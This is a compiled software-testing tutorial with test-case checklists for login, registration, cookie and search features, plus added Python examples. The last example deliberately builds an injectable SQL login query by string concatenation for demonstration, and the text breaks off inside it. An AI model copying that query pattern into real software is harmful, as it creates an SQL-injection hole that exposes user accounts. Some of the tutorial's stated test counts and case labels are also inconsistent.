Software Testing Tutorial

The document describes test scenarios for a registration form and login page. It includes 21 test cases to verify the functionality and validation of fields in the registration form, such as required fields, data types, character limits, and business rules. It also lists 14 functional test cases and 8 security test cases for the login page, focusing on valid and invalid login attempts, session management, and input validation. Finally, it provides 8 test scenarios for a Gmail login page.

Uploaded by Elena Alina
Test Scenarios of a Registration Form:

1. Verify that the Registration form contains Username, First Name, Last Name, Password, Confirm Password, Email Id, Phone number, Date of birth, Gender, Location, Terms of use, Submit, and Login (if you already have an account)
2. Verify that tab functionality is working properly
3. Verify that the Enter/Tab key works as a substitute for the Submit button
4. Verify that all the fields such as Username, First Name, Last Name, Password and other fields have a valid placeholder
5. Verify that the labels float upward when the text field is in focus or filled (in case of floating labels)
6. Verify that all the required/mandatory fields are marked with * against the field
7. Verify that clicking on the submit button after entering all the mandatory fields submits the data to the server
8. Verify that the system generates a validation message when clicking on the submit button without filling all the mandatory fields
9. Verify that entering blank spaces in mandatory fields leads to a validation error
10. Verify that clicking on the submit button while leaving optional fields empty submits the data to the server without any validation error
11. Verify the case sensitivity of Username (usually the Username field should not be case sensitive: ‘rajkumar’ and ‘RAJKUMAR’ act the same)
12. Verify that the system generates a validation message when entering an existing username
13. Verify the character limit in all the fields (mainly username and password) based on the business requirement
14. Verify the username validation as per the business requirement (in some applications, the username should not allow numeric and special characters)
15. Verify that the validation of all the fields is as per the business requirement
16. Verify that the date of birth field does not allow dates greater than the current date (some applications have an age limit of 18; in that case you have to validate whether the age is greater than or equal to 18 or not)
17. Verify the validation of the email field by entering an incorrect email id
18. Verify the validation of numeric fields by entering alphabets and characters
19. Verify that leading and trailing spaces are trimmed after clicking on the submit button
20. Verify that the “terms and conditions” checkbox is unselected by default (depends on business logic, it may be selected or unselected)
21. Verify that the validation message is displayed when clicking on the submit button without selecting the “terms and conditions” checkbox
22. Verify that the password is in encrypted form when entered
23. Verify whether the password and confirm password are the same or not
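The rules the checklist above tests (mandatory fields, whitespace-only input, case-insensitive usernames, character limits, a future or under-age date of birth, email and numeric formats, trimming, matching passwords, the terms checkbox) can be exercised directly against a validator. The following is an added example written for this page, not code from the original tutorial; the field names, the 20/64-character limits, the letters-only username rule, the age limit of 18 and the reference date are assumptions chosen to illustrate the checks:

```python
"""Added example (not from the original tutorial): a registration-form
validator that encodes the rules the checklist above tests, so each
scenario can be exercised as an automated check.  Field names, limits,
the age rule and the reference date are assumptions chosen for
illustration."""
from __future__ import annotations
import re
from datetime import date

REQUIRED = ("username", "first_name", "last_name", "password",
            "confirm_password", "email", "phone", "dob")
MAX_LEN = {"username": 20, "password": 64}      # assumed business limits (item 13)
MIN_AGE = 18                                     # assumed age rule (item 16)
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
USERNAME_RE = re.compile(r"^[A-Za-z]+$")         # letters only, as item 14 describes
REFERENCE_DATE = date(2024, 1, 1)                # constructed "today" for reproducible runs

# Constructed store of already-registered usernames, kept lower-case so
# lookups are case-insensitive (item 11).
EXISTING_USERNAMES = {"rajkumar"}


def normalise(form: dict) -> dict:
    """Trim leading/trailing spaces from every text field (item 19)."""
    return {k: v.strip() if isinstance(v, str) else v for k, v in form.items()}


def validate_registration(form: dict, today: date | None = None) -> list[str]:
    """Return a list of validation messages; an empty list means the form
    may be submitted.  Blank or whitespace-only mandatory fields are
    rejected (items 8 and 9) because normalisation runs first."""
    today = today or date.today()
    f = normalise(form)
    errors: list[str] = []

    for field in REQUIRED:
        if not f.get(field):
            errors.append(f"{field} is required")
    if errors:
        return errors  # no point checking the format of missing fields

    for field, limit in MAX_LEN.items():
        if len(f[field]) > limit:
            errors.append(f"{field} exceeds {limit} characters")

    if not USERNAME_RE.fullmatch(f["username"]):
        errors.append("username must contain letters only")
    elif f["username"].lower() in EXISTING_USERNAMES:
        errors.append("username already exists")

    if not EMAIL_RE.fullmatch(f["email"]):
        errors.append("email is invalid")
    if not f["phone"].isdigit():
        errors.append("phone must be numeric")

    try:
        dob = date.fromisoformat(f["dob"])
    except ValueError:
        errors.append("dob must be YYYY-MM-DD")
    else:
        if dob > today:
            errors.append("dob cannot be in the future")
        else:
            # Subtract one year if this year's birthday has not happened yet.
            age = today.year - dob.year - ((today.month, today.day) < (dob.month, dob.day))
            if age < MIN_AGE:
                errors.append(f"must be at least {MIN_AGE} years old")

    if f["password"] != f["confirm_password"]:
        errors.append("password and confirm password do not match")
    if not f.get("terms_accepted"):
        errors.append("terms and conditions must be accepted")
    return errors


GOOD_FORM = {  # constructed sample input that satisfies every rule
    "username": "alice", "first_name": "Alice", "last_name": "Smith",
    "password": "s3cret-pw", "confirm_password": "s3cret-pw",
    "email": "alice@example.com", "phone": "5551234567",
    "dob": "1990-05-01", "terms_accepted": True,
}

if __name__ == "__main__":
    print(validate_registration(GOOD_FORM, today=REFERENCE_DATE))
    print(validate_registration({**GOOD_FORM, "username": "RAJKUMAR"}, today=REFERENCE_DATE))
```

Each negative scenario from the list maps to one altered copy of GOOD_FORM, which is how the checks would be organised in a test suite.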

Test Cases – Login Page

Following is the possible list of functional and non-functional test cases for a login page:

Functional Test Cases:

Sr. No. | Functional Test Case | Type (Positive/Negative)
1 | Verify if a user will be able to login with a valid username and valid password. | Positive
2 | Verify if a user cannot login with a valid username and an invalid password. | Negative
3 | Verify the login page for both, when the field is blank and the Submit button is clicked. | Negative
4 | Verify the ‘Forgot Password’ functionality. | Positive
5 | Verify the messages for invalid login. | Positive
6 | Verify the ‘Remember Me’ functionality. | Positive
7 | Verify if the data in the password field is visible as asterisks or bullet signs. | Positive
8 | Verify if a user is able to login with a new password only after he/she has changed the password. | Positive
9 | Verify if the login page allows logging in simultaneously with different credentials in a different browser. | Positive
10 | Verify if the ‘Enter’ key of the keyboard is working correctly on the login page. | Positive

Other Test Cases:

Sr. No. | Test Case | Type
11 | Verify the time taken to log in with a valid username and password. | Performance & Positive
12 | Verify if the font, text color, and color coding of the Login page are as per the standard. | UI Testing & Positive
13 | Verify if there is a ‘Cancel’ button available to erase the entered text. | Usability Testing
14 | Verify the login page and all its controls in different browsers. | Browser Compatibility Testing

Non-functional Security Test Cases:

Sr. No. | Security Test Case | Type (Negative/Positive)
1 | Verify if a user cannot enter more characters than the specified range in each field (Username and Password). | Negative
2 | Verify if a user cannot enter more characters than the specified range in each field (Username and Password). | Positive
3 | Verify the login page by pressing the ‘Back’ button of the browser. It should not allow you to enter the system once you log out. | Negative
4 | Verify the timeout functionality of the login session. | Positive
5 | Verify that a user is not allowed to log in with different credentials from the same browser at the same time. | Negative
6 | Verify if a user is able to login with the same credentials in different browsers at the same time. | Positive
7 | Verify the Login page against SQL injection attack. | Negative
8 | Verify the implementation of the SSL certificate. | Positive

Test Cases for Gmail Login page

Sr. No. | Test Scenario
1 | Enter a valid email address & click Next. Verify if the user gets an option to enter the password.
2 | Don’t enter an email address or phone number & just click the Next button. Verify if the user gets the correct message or if the blank field gets highlighted.
3 | Enter an invalid email address & click the Next button. Verify if the user gets the correct message.
4 | Enter an invalid phone number & click the Next button. Verify if the user gets the correct message.
5 | Verify if a user can log in with a valid email address and password.
6 | Verify if a user can log in with a valid phone number and password.
7 | Verify if a user cannot log in with a valid phone number and an invalid password.
8 | Verify if a user cannot log in with a valid email address and a wrong password.
9 | Verify the ‘Forgot email’ functionality.
10 | Verify the ‘Forgot password’ functionality.

Test Scenarios for the Sign-up page

#1) Verify the messages for each mandatory field.
#2) Verify if the user cannot proceed without filling all the mandatory fields.
#3) Verify the age of the user when the DOB is selected.
#4) Verify if numbers and special characters are not allowed in the First and Last name.
#5) Verify if a user can sign up successfully with all the mandatory details.
#6) Verify if a user can log in with the valid details.
#7) Verify if the Password and Confirm Password fields accept identical strings only.
#8) Verify if the Password field prompts you about weak passwords.
#9) Verify that a duplicate email address does not get assigned.
#10) Verify that hints are provided for each field on the form, for ease of use.

Test Scenarios for the Login page of Mobile Application

#1) Verify if a user can log in with a valid username and password.
#2) Verify if a user cannot log in with an invalid username or password. Check permutations and combinations of this.
#3) Verify the ‘Keep me Signed In’ option. If this check box is selected, then the user should not get logged out even after exiting the app.
#4) Verify that this check box is not selected by default.
#5) If the user has signed up with Facebook or social media, verify whether the user can log in with those credentials.
#6) Verify the Forgot password functionality.
#7) Verify if the login page fits the mobile screen. The user should not have to scroll the screen.
Conclusion

While writing test cases for a login or sign-up page, write test cases for all the fields. There should be a combination of both positive and negative test cases. Try to cover the performance, security, and functional scenarios.

The login page has fewer controls than most pages, so even though it looks simple to test, it should not be considered an easy task.

Also, many a time it is the first impression of an application, so its user interface and usability should be perfect.

Test Scenarios Login Page [How To Write Test Scenarios of a Login Page]

Test Scenarios Login Page

In any application, logging in is the process by which an individual with valid user credentials gains access to the application. Logging in is usually used to enter a specific page which trespassers cannot see. In this post, we will see “Test Scenarios Login Page”. Testing of the Login page is very important for any application in terms of security. We will try to cover the most widely used Login Page scenarios here.

We usually write test cases for the login page of every application we test. Every login page should have the following elements.

1. ‘Email/Phone Number/Username’ Textbox
2. ‘Password’ Textbox
3. Login Button
4. ‘Remember Me’ Checkbox
5. ‘Keep Me Signed In’ Checkbox
6. ‘Forgot Password’ Link
7. ‘Sign up/Create an account’ Link
8. CAPTCHA

Following are the test cases for a User Login Page. The list consists of both positive and negative test scenarios for a login page.

Test Cases of a Login Page (Test Scenarios Login Page):
1. Verify that the cursor is focused on the “Username” text box on page load (login page)
2. Verify that the login screen contains elements such as Username, Password, Sign in button, Remember password check box, Forgot password link, and Create an account link.
3. Verify that tab functionality is working properly
4. Verify that the Enter/Tab key works as a substitute for the Sign in button
5. Verify that all the fields such as Username and Password have a valid placeholder
6. Verify that the labels float upward when the text field is in focus or filled (in case of floating labels)
7. Verify that the User is able to Login with Valid Credentials
8. Verify that the User is not able to Login with an invalid Username and invalid Password
9. Verify that the User is not able to Login with a Valid Username and invalid Password
10. Verify that the User is not able to Login with an invalid Username and Valid Password
11. Verify that the User is not able to Login with a blank Username or Password
12. Verify that the User is not able to Login with inactive credentials
13. Verify that clicking on the browser back button after successful login does not take the User to logged out mode
14. Verify that clicking on the browser back button after successful logout does not take the User to logged in mode
15. Verify that there is a limit on the total number of unsuccessful login attempts (the number of invalid attempts should be based on business logic; based on the business logic, the User will be asked to enter a captcha and try again, or the user will be blocked)
16. Verify that the password is in encrypted form when entered
17. Verify whether the password can be copy-pasted
18. Verify that the encrypted characters in the “Password” field do not allow deciphering if copied
19. Verify that the User is able to login with the new password after changing the password
20. Verify that the User is not able to login with the old password after changing the password
21. Verify that spaces are not allowed before any password characters
22. Verify whether the User is still logged in after a series of actions such as sign in, close the browser and reopen the application.
23. Verify the ways to retrieve the password if the User forgets the password
24. Verify that the “Remember password” checkbox is unselected by default (depends on business logic, it may be selected or unselected)
25. Verify that the “Keep me logged in” checkbox is unselected by default (depends on business logic, it may be selected or unselected)
26. Verify the timeout of the login session (Session Timeout)
27. Verify that the logout link redirects to the login/home page
28. Verify that the User is redirected to the appropriate page after successful login
29. Verify that the User is redirected to the Forgot password page when clicking on the Forgot Password link
30. Verify that the User is redirected to the Create an account page when clicking on the Sign up / Create an account link
31. Verify that a validation message is displayed when the User leaves Username or Password blank
32. Verify that a validation message is displayed when exceeding the character limit of the Username and Password fields
33. Verify that a validation message is displayed when entering special characters in the Username and Password fields
34. Verify whether the login form reveals any security information when viewing the page source
35. Verify that the login page is not vulnerable to SQL injection
36. Verify whether a Cross-site scripting (XSS) vulnerability works on the login page. An XSS vulnerability may be used by hackers to bypass access controls.

If there is a captcha on the login page (Test Cases for CAPTCHA):

37. Verify whether there is client-side validation when the User doesn’t enter the CAPTCHA
38. Verify that the refresh link of the CAPTCHA generates a new CAPTCHA
39. Verify that the CAPTCHA is case sensitive
40. Verify whether the CAPTCHA has audio support to listen to
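Several of the cases above (12, 14, 15, 19, 20, 26 and 27) are about server-side state rather than the form itself: inactive accounts, lockout after repeated failures, session timeout, logout invalidating the session, and a changed password retiring the old one. The block below is an added example for this page, not code from the original post; the five-attempt lockout, the 900-second idle timeout and the PBKDF2 settings are assumptions, and time is passed in explicitly so the behaviour can be checked deterministically:

```python
"""Added example (not part of the original tutorial): a minimal
authentication/session model that automated checks for items 12, 14,
15, 19, 20, 26 and 27 above can be run against.  The lockout threshold,
session timeout and hashing parameters are assumptions chosen for
illustration, not settings from any real product."""
from __future__ import annotations
import hashlib
import hmac
import os
import secrets

MAX_FAILED_ATTEMPTS = 5   # assumed business rule (item 15)
SESSION_TIMEOUT = 900     # seconds of inactivity before a session expires (item 26)


def _hash_password(password: str, salt: bytes) -> bytes:
    # Stored form of the password: salted PBKDF2, never the clear text.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class AuthService:
    def __init__(self) -> None:
        self.users: dict[str, dict] = {}      # username -> record
        self.sessions: dict[str, dict] = {}   # token -> {user, last_seen}

    def register(self, username: str, password: str, active: bool = True) -> None:
        salt = os.urandom(16)
        self.users[username.lower()] = {
            "salt": salt, "hash": _hash_password(password, salt),
            "active": active, "failed": 0, "locked": False,
        }

    def login(self, username: str, password: str, now: float) -> str | None:
        """Return a session token on success, None on any failure.
        Failures deliberately share one outcome so the response does not
        reveal whether the username exists or is locked."""
        rec = self.users.get(username.lower())
        if rec is None or not rec["active"] or rec["locked"]:
            return None   # unknown, inactive (item 12) or locked account
        if not hmac.compare_digest(rec["hash"], _hash_password(password, rec["salt"])):
            rec["failed"] += 1
            if rec["failed"] >= MAX_FAILED_ATTEMPTS:
                rec["locked"] = True      # item 15: block after too many failures
            return None
        rec["failed"] = 0
        token = secrets.token_urlsafe(32)
        self.sessions[token] = {"user": username.lower(), "last_seen": now}
        return token

    def is_logged_in(self, token: str, now: float) -> bool:
        """A session is valid only if it exists and has not idled past the
        timeout; an expired session is dropped so it cannot be revived."""
        sess = self.sessions.get(token)
        if sess is None:
            return False
        if now - sess["last_seen"] > SESSION_TIMEOUT:
            del self.sessions[token]
            return False
        sess["last_seen"] = now
        return True

    def logout(self, token: str) -> None:
        # Items 14 and 27: after logout the token must be useless, so the
        # browser back button cannot restore an authenticated page.
        self.sessions.pop(token, None)

    def change_password(self, username: str, old: str, new: str, now: float) -> bool:
        """Items 19 and 20: only the new password works afterwards, and
        every existing session of the user is terminated."""
        if self.login(username, old, now) is None:
            return False
        rec = self.users[username.lower()]
        rec["salt"] = os.urandom(16)
        rec["hash"] = _hash_password(new, rec["salt"])
        user = username.lower()
        self.sessions = {t: s for t, s in self.sessions.items() if s["user"] != user}
        return True
```

A test for case 13 (back button after login) is the mirror image of `logout`: the token stays valid until the user logs out or the idle timeout passes, so re-rendering a cached page must still find a live session.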

Learn Website Cookie Testing – Complete Guide [Cookie Testing Test Cases] | SoftwareTestingMaterial

Website Cookie Testing

In this Cookie Testing Tutorial, we will see what a cookie is, what the role of cookies in a web application is, and how to write test cases to test web application cookies. As a Software Tester, we need to test cookies whenever we test websites. In this tutorial, we will see some tools to test cookies, tools to test whether your local system is accepting cookies or not, and a tool to test whether any particular domain is accepting cookies or not.

• 1. What is a Cookie
• 2. How do Cookies work
• 3. Types of Cookies
• 4. Where Are Cookies Stored In Different Browsers
• 5. Cookie Testing
• 6. How to test Cookies – Sample Test Cases for Web Application Cookie Testing
• 7. Plugins To Test Cookies

What is a Cookie?

A Cookie is also known as an HTTP cookie, web cookie, internet cookie, or browser cookie.

A Cookie is a small piece of information sent from a website and stored on the user’s hard drive (in a text file) by the user’s web browser while the user is browsing, and is sent back to the website each time the browser requests a page from the website. Cookies were designed to track the user’s browsing activities such as login credentials and visited pages, to store stateful information such as items added to the shopping cart in an online store, or to record the information filled in by the user in form fields such as name, card details, address details etc. So a cookie stores personalized information such as login details, language preference, mobile or desktop version preference, etc. Usually cookies store information for shorter periods. Cookies are used while implementing User sessions, User tracking, Advertisements, Shopping carts etc.

How do Cookies work?

Assume there is a website which serves in two languages, say English and Burmese. The website by default opens in the Burmese language and allows users to change the language to English to view the site in English. You are an English speaker who wants to view the website always in English. If the website uses cookies to store the language, then once you change the language from Burmese to English, whenever you come back to the site, the site will load in English. Here the cookie on your local system is sent to the web server with each request, and the server returns the webpage in the English language. So the web pages in your browser will load in English.

Remember there will be an expiration time for cookies. The expiration time varies from website to website and is set while writing the cookie code.

Cookies contain attributes such as the Domain name (from where the cookie was sent), a random value (which is a unique number), the lifetime of the Cookie (Expires and Max-Age), and the path of the cookie.

Types of Cookies:

Usually, there are two types of cookies.

Session Cookies:

As the name suggests, session cookies work until the session has been destroyed. This type of cookie lasts until the browser that created the cookie is closed.

It is also called an in-memory cookie or transient cookie. Session cookies do not have an expiration date assigned to them.

In simple words, it is stored in temporary memory which expires once you close your browser.

Persistent Cookies:

Persistent cookies continue to exist until their time runs out. These cookies are stored on the user’s hard disk for days, months or years, depending on the cookie creator. These cookies are used to track the user’s browsing activities. They are also called tracking cookies, and are used for legitimate purposes such as keeping you logged into your account without re-entering your account details, or displaying advertisements based on the user’s previous browsing history.
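The attributes listed above (Domain, Path, Expires, Max-Age) and the session/persistent distinction can both be read off a Set-Cookie response header. The following parser is an added example for this page, not code from the original tutorial; the three sample headers and the fixed reference time are constructed so the classification is reproducible offline:

```python
"""Added example (not from the original tutorial): a small parser for
Set-Cookie response headers that reads the attributes named above
(Domain, Path, Expires, Max-Age) and classifies each cookie as a
session cookie or a persistent cookie.  The sample headers and the
reference time are constructed for illustration."""
from __future__ import annotations
from dataclasses import dataclass, field
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Constructed reference "now" so lifetimes come out the same on every run.
FIXED_NOW = datetime(2024, 12, 31, tzinfo=timezone.utc)


@dataclass
class Cookie:
    name: str
    value: str
    attrs: dict[str, str | None] = field(default_factory=dict)

    @property
    def persistent(self) -> bool:
        """Max-Age or Expires makes a cookie persistent; without both the
        browser keeps it only in memory until it closes (session cookie)."""
        return "max-age" in self.attrs or "expires" in self.attrs

    def seconds_to_live(self, now: datetime) -> float | None:
        """Remaining lifetime in seconds, or None for a session cookie.
        Per RFC 6265, Max-Age takes precedence over Expires when both exist."""
        if "max-age" in self.attrs:
            return float(self.attrs["max-age"] or 0)
        if "expires" in self.attrs:
            expiry = parsedate_to_datetime(self.attrs["expires"] or "")
            return (expiry - now).total_seconds()
        return None


def parse_set_cookie(header: str) -> Cookie:
    """Parse one Set-Cookie header value into a Cookie.  Attribute names
    are case-insensitive, so they are stored lower-cased; flag attributes
    such as Secure and HttpOnly are stored with a None value."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = Cookie(name.strip(), value.strip())
    for attr in parts[1:]:
        if not attr:
            continue
        key, sep, val = attr.partition("=")
        cookie.attrs[key.strip().lower()] = val.strip() if sep else None
    return cookie


# Constructed sample headers, as a tester might capture them from a response.
SAMPLE_HEADERS = [
    "sessionid=abc123; Path=/; HttpOnly; Secure",
    "lang=en; Domain=example.com; Path=/; Max-Age=31536000",
    "promo=xyz; Expires=Wed, 01 Jan 2025 00:00:00 GMT; Path=/",
]


def classify(headers: list[str], now: datetime) -> dict[str, str]:
    """Map cookie name -> 'session' or 'persistent (N s left)'."""
    result: dict[str, str] = {}
    for h in headers:
        c = parse_set_cookie(h)
        ttl = c.seconds_to_live(now)
        result[c.name] = "session" if ttl is None else f"persistent ({int(ttl)} s left)"
    return result


if __name__ == "__main__":
    for name, kind in classify(SAMPLE_HEADERS, FIXED_NOW).items():
        print(f"{name}: {kind}")
```

The same parsed attributes are what a cookie security review looks at next: whether a session cookie carries Secure and HttpOnly, and whether a persistent lifetime is appropriate for what the cookie holds.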

Where Are Cookies Stored In Different Browsers?

Where cookies are stored on the user’s system depends on the browser.

Chrome: Settings – Advanced – Privacy and security – Content Settings – Cookies – See all cookies and site data
Firefox: Open Firefox and click on the Hamburger menu – Go to Options – Privacy – Remove individual cookies
Internet Explorer: Internet options – Settings – Temporary Internet Files – View files
Safari: Edit – Preferences – Privacy – Details – Manage website data

Cookie Testing:

Cookie Testing is the process of verifying whether the cookies are working as intended or not. In cookie testing, testers need to test the status of the cookie, expiration of the cookie, accessibility of the cookie, security constraints, etc.

How to test Cookies – Sample Test Cases for Web Application Cookie Testing:

Important Test Scenarios for Testing Cookies of a Web Application are listed below. You can use this cookie testing checklist to do Cookie Testing.
1. Verify whether the application is creating cookies on disk
2. Verify whether the user is able to access the application after disabling the cookies.
Disabling Cookies: Web pages may crash if we disable the cookies. Disable cookies on your browser. Access the website after all the cookies are disabled on your browser. There shouldn’t be any crashes or blockers. Here you need to verify two things:
i. Is there an appropriate message displayed to the Users asking them to enable cookies to access the site
ii. Is there any workaround to access the site for browsers with cookies disabled
3. Verify whether the user is able to access the application after removing the cookies.
Removing Cookies: Remove all the cookies related to the website you are testing and check whether the website is working without any crash. Removal of cookies may result in loss of data and lead to a system crash.
4. Verify whether the user is able to access the application after deleting the cookies.
Deleting Cookies: Make sure your website is creating cookies. Once the cookie is created, close the browser and delete the cookies manually. Now open the browser, navigate to the website and test the behavior of the website. Deleting the cookies may sometimes break the website.
5. Verify whether the user is able to access the application after corrupting (by editing) the cookies
Corrupting Cookies: Manually edit the cookie using any plugin. You can also open cookies using Notepad. Earlier we mentioned where cookies are stored. Change the values of the cookies (such as the expiry date of the cookie or the name of the cookie) to irrelevant data. Try to change the login credentials of a User in the cookie to those of another valid User and try to log in. The system shouldn’t allow you to log in with the modified User details.
6. Verify whether all the sensitive data (user credentials) stored in a cookie is in encrypted form or not. (Cookie Encryption)
7. Verify whether the cookies are being written correctly on all supported browsers. (Cross Browser Testing)
8. Verify that the user is able to access the site without accepting all the cookies.
Accept or Reject Cookies: Make sure your browser is writing cookies. Access the website and allow the browser to write cookies. Now disable the cookies and try to access the site. Doing this may crash your site.
9. Verify that there is no overuse of cookies.
No Overuse of Cookies: Overuse of cookies brings the site traffic down. Also, prompting for cookies too often irritates the Users. Ultimately your site will lose traffic. Loss of traffic brings your business down.
10. Verify that no personal or sensitive data is stored in the cookie.
Privacy testing: In some cases, websites collect personal or sensitive data and store it in cookies. Make sure that the personal or sensitive data stored in a cookie is in an encrypted format.
If you have come across any other test scenarios of website cookie testing, please mention them in the comments below.
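Scenarios 5, 6 and 10 above ask how a server should behave when a tester edits a cookie, and what should never be in one. The block below is an added example for this page, not code from the original tutorial: a session cookie that carries only an opaque user id and an expiry, signed with HMAC-SHA256 so that any edit to the value (including swapping in another valid user's id, the check scenario 5 describes) is rejected. The secret key, the user ids and the timestamps are constructed for illustration.

```python
"""Added example (not from the original tutorial): a signed session
cookie, showing what the 'Corrupting Cookies' and 'Privacy testing'
scenarios above expect a server to do: reject a cookie whose value has
been edited, and keep no clear-text credentials in the cookie at all.
The key, user ids and timestamps are constructed for illustration."""
from __future__ import annotations
import base64
import hashlib
import hmac
import json
import time

SECRET_KEY = b"constructed-demo-key-do-not-reuse"  # would come from server config


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_cookie(user_id: int, ttl: int, now: float | None = None) -> str:
    """Cookie value = base64(payload) '.' base64(HMAC-SHA256(payload)).
    Only an opaque user id and an expiry go in; no password, no email."""
    payload = json.dumps({"uid": user_id, "exp": int((now or time.time()) + ttl)},
                         separators=(",", ":")).encode()
    mac = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return f"{_b64(payload)}.{_b64(mac)}"


def read_cookie(value: str, now: float | None = None) -> int | None:
    """Return the user id if the signature matches and the cookie has not
    expired, else None.  Any edit to the payload (changing the uid to
    another valid user, extending exp) changes the MAC and is rejected;
    a malformed value is rejected the same way."""
    try:
        body, sig = value.split(".", 1)
        payload, mac = _unb64(body), _unb64(sig)
    except (ValueError, TypeError):
        return None
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):  # constant-time comparison
        return None
    data = json.loads(payload)
    if data["exp"] < (now or time.time()):
        return None
    return data["uid"]


def edit_uid(value: str, new_uid: int) -> str:
    """The tester's edit from scenario 5: rewrite the uid in the payload
    while keeping the old signature, which read_cookie must refuse."""
    body, sig = value.split(".", 1)
    data = json.loads(_unb64(body))
    data["uid"] = new_uid
    forged = json.dumps(data, separators=(",", ":")).encode()
    return f"{_b64(forged)}.{sig}"
```

Signing makes the cookie tamper-evident, not secret: the uid is still readable, which is why scenario 10 additionally requires that nothing personal or sensitive is placed in the payload in the first place.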

Plugins To Test Cookies:

For Google Chrome Users:
EditThisCookie – Here is the download link

For Mozilla Firefox Users:
Mozilla Advanced Cookie Manager – Here is the download link

Some other tools to test the cookies

Cookie Tester – Here is the link to the site

This site is used to test your browser’s cookie-related settings. You can request this site to send a cookie to your browser. If you’ve configured your browser to reject cookies, you can request this site to send a cookie to the browser and check if the cookie gets rejected. If you’ve configured your browser to accept cookies, you can use this page to make sure that the cookies are being sent and aren’t getting blocked.

• Set the Cookie name and Value
• Click on ‘Set TestCookie’

If you have disabled the cookies then the cookie should be rejected.

Cookie Checker – Here is the link to the site

This site checks the cookies from a site and gives a full report on the purpose of each cookie.

Conclusion

The purpose of a cookie is to identify users, to save login information for a website, or to prepare customized web pages. A cookie saves the Users’ time when they revisit the site. Cookie testing is quite common and important in terms of security and quick access to any web application. As a web application tester, you have to include cookie testing as a part of your test plan.

20 Scenarios for Testing Login Pages & Search Functionalities

By Ajit Pendse

I recently had a conversation with a prospect and when I mentioned website UX testing to him, he paused and asked me with a dubious tone, “Why does a website need UX testing?”

I explained to him that a few major reasons why UX testing is so important are that improved user experience ensures customer satisfaction, retention & product promotion through mouth publicity. If the users cannot find what they are looking for on one website, they will inevitably move on to the next with the same product offering. So even if a site looks breathtaking and gets lots of bells and whistles for it, if the user can’t figure out how to use it, he is bound to move on.

While explaining this to him, it struck me that UX testers often invest time and effort to test some of the most complex scenarios possible to curate the best user experience. However, in the pursuit of testing these complex scenarios, it may so happen that they miss out on testing the basic but crucial functionalities, such as the Login & Search Functionality.

In this blog, we provide a handy list of 20+ test scenarios which are a must-add to the list of test cases, specifically for testing the login page and search functionality.

Login Scenarios:

GUI & Functionality:
1. Minimum and maximum lengths should be set for all the text boxes
2. The password should be displayed in masked format rather than showing the actual text
3. Login credentials in UPPER case should not be treated as invalid
4. A validation message should be shown when special characters are entered in the username field, when an invalid username and/or password is entered, or when the fields are left blank
5. The Reset button should clear data from all the text boxes in the form
6. Login credentials, especially the password, should be stored in the database in encrypted format

Security:
1. When a logged-in user copies the URL and pastes it in a new browser window, it should redirect to the Login page
2. Users should not be allowed to copy and paste the Password from the text box
3. A notification email for multiple device login should be sent if the user logs in from an unusual device/machine
4. Entering login credentials using a virtual keyboard should be provided for banking applications
5. After 3 or 5 unsuccessful login attempts, the user’s login credentials should get locked for a specific period, e.g. 24 hours
6. An SSL certificate should be implemented/installed for a secured website
7. SQL injection attacks & XSS should be verified for login
8. Two-way authentication through OTP on mobile/email should be tested for banking applications

Session:
1. After logout, if the user clicks on the back button the user should not be able to log in within the same session; it should redirect to the login page
2. If the user is logged in on multiple devices and logs out from one device, then it should log out from all platforms/devices
3. A maximum session timeout should be set for a secured website

Browser:
1. If browser cookies are cleared and the user tries to log in, the system should ask for credentials again
2. The ‘Remember Form Data’ setting of the browser should not remember the password
3. Validate the login functionality when browser cookies are turned OFF

Search Scenarios
1. Search results displayed should be relevant to the search keyword
2. A % sign in the search keyword should not redirect to a 404 ERROR
3. The application should not crash if the user inserts % in the search field
4. When the user starts typing a word in the text box it should suggest words that match the typed keyword
5. There should be pre-defined search criteria for auto-complete, e.g. after typing the first 3 letters it should suggest matching keywords
6. When the user clicks on any link from the results and navigates back, the results should be maintained
7. After clicking on the Search field, the search history should be displayed (latest search keywords)
8. All search keywords/filters should get cleared on clicking the Reset button
9. Search results should be cleared on clicking the clear search button
10. History displayed in the search field should be relevant to the logged-in user only
11. Pagination should be tested for searches returning a high number of records
12. The total number of search records/results should be displayed on the page
13. The search keyword should be highlighted with color in the search results
14. For ecommerce sites, the search keyword should suggest similar kinds of products/items
15. For Advanced Search, limited search filters should be provided
16. Watermark text should be provided for the user to understand what to search
17. Validate the search rules defined for “Exact Match” with the search keyword
18. Validate the search rules defined for “Similar Match” with the search keyword
19. Validate the search rules defined to search with a set of keywords
20. The user should be able to search when he enters the keyword and hits the ‘Enter’ key on the keyboard
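Two items in the lists above are about how user input reaches the database: the Security item "SQL injection attacks & XSS should be verified for login", and Search Scenarios 2 and 3, which require that a % sign in the keyword does not break the search. The following is an added example for this page, not code from the blog post, covering the SQL part of both: a login query built by string concatenation beside its parameterised form, and a LIKE search that escapes wildcard characters. The in-memory SQLite database, the rows in it and the probe string are constructed for illustration; the password column is assumed to hold a hash computed elsewhere.

```python
"""Added example (not from the blog post): the login and search queries
behind the 'SQL injection' and '% in the search keyword' scenarios.
login_vulnerable is deliberately written the wrong way so the tester's
probe can be seen to succeed against it and fail against login_safe.
The database, rows and probe are constructed in memory."""
from __future__ import annotations
import sqlite3


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, pw_hash TEXT)")
    con.execute("CREATE TABLE products (title TEXT)")
    # pw_hash is assumed to be produced by a password hash elsewhere.
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "hash-of-alice-pw"), ("bob", "hash-of-bob-pw")])
    con.executemany("INSERT INTO products VALUES (?)",
                    [("100% cotton shirt",), ("cotton socks",), ("wool hat",)])
    return con


def login_vulnerable(con: sqlite3.Connection, name: str, pw_hash: str) -> bool:
    # Deliberately vulnerable: user input is spliced into the SQL text, so a
    # quote character in the input changes the structure of the query.
    sql = f"SELECT 1 FROM users WHERE name = '{name}' AND pw_hash = '{pw_hash}'"
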